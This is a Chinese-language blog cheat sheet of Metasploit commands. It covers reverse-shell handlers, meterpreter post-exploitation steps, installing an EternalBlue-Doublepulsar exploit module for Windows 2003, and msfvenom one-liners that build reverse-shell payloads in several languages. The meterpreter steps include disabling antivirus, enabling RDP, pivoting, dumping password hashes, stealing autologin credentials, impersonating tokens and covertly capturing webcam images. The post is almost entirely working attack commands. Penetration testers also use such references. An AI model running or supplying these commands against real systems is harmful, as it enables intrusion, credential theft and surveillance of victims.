MSF常用命令备忘录

msf下的命令

set session x:设置要攻击的session

#监听端口反弹PHP shell
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST
set LPORT
run
#end

#windows/shell_reverse_tcp模块可创建具有meterpreter功能的各版本shellcode,比如Asp、Aspx、msi、vbs、war
#使用windows/shell_reverse_tcp反弹shell
show payloads
use windows/shell_reverse_tcp
set LHOST
set LPORT
save
generate -h    #查看具体命令
generate -t asp #生成asp的shellcode
#监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST
set LPORT
run
#将shell上传后访问
#end

 

meterpreter下的命令

ps:获取目标机正在运行的进程
getpid:查看meterpreter shell的进程号
migrate 448:把meterpreter shell移动到PID为448的进程中
kill 984:杀掉PID为984的进程
run post/windows/manage/migrate:自动寻找合适的进程迁移
sysinfo:查看目标系统信息
run post/windows/gather/checkvm:检查目标是否运行在虚拟机上
idletime:查看目标机最近的运行时间
route:目标机完整的网络设置
getuid:查看当前用户名
background:将当前会话放到后台(适合在多个meterpreter会话的场景下使用)
run post/windows/manage/killav:关闭目标机系统杀毒软件
run post/windows/manage/enable_rdp:开启目标机3389端口
run post/windows/manage/autoroute:查看目标机的本地子网情况
background->route add xxx xxx(添加路由)->route print(查看路由)
↑[路由添加到已攻陷的主机的路由表中,就可以借助被攻陷的主机对其他网络进行攻击]
run post/windows/gather/enum_logged_on_users:列举当前有多少用户登录了目标机
run post/windows/gather/enum_applications:列举安装在目标机上的应用程序
run windows/gather/credentials/windows_autologin:抓取自动登录的用户名和密码
load espia(加载espia插件)->screengrab(抓取目标机的屏幕截图)
screengrab(也可直接使用screengrab命令抓取目标机的屏幕截图)
webcam_list:查看目标机是否有摄像头
webcam_snap:打开目标机摄像头拍一张照片
webcam_stream:抓取目标机视频
shell:进入目标机shell
exit:停止meterpreter会话
pwd/getwd:查看当前处于目标机哪个目录
getlwd:查看当前处于本地的那个目录
ls:列出当前目录的所有文件
cd:切换目录
search -f *.txt -d c:\:搜索C盘中所有txt文件(-f指定搜索文件模式,-d指定目录)
download c:\test.txt /root:下载目标机c盘的test.txt文件到本机root下
upload /root/test.txt c:\:上传本地root下test.txt文件到目标机c盘下
getsystem:提权

#假冒令牌↓
#有两种类型令牌:
#Delegation Tokens(授权令牌,支持交互式登录,例如远程桌面登录)
#Impersonation Tokens(模拟令牌,非交互式的会话)
在incognito下假冒
use incognito->list_tokens -u:列出可用的token
impersonate_token xxxx\\system:假冒xxxx用户进行攻击(要用两个\)
#end

hashdump:导出目标机的hash
run windows/gather/smart_hashdump:导出域所有用户的hash

 

 

移植并利用MS17-010(windows 2003)漏洞利用代码

#MSF中MS17-010不支持windows 2003
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
将Eternalblue-Doublepulsar-Metasploit文件夹下的eternalblue-doublepulsar.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb下
msfconsole->reload_all   #在MSF下重新加载全部文件
search eternalblue-doublepulsar    #现在就可以搜到该脚本了

 

利用msfvenom生成shell的命令

Linux:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

Python:
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl:
msfvenom -p cmd/unix/reverse
_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

 

 

 

posted @ 2020-08-12 22:36  vvan9  阅读(888)  评论(0编辑  收藏  举报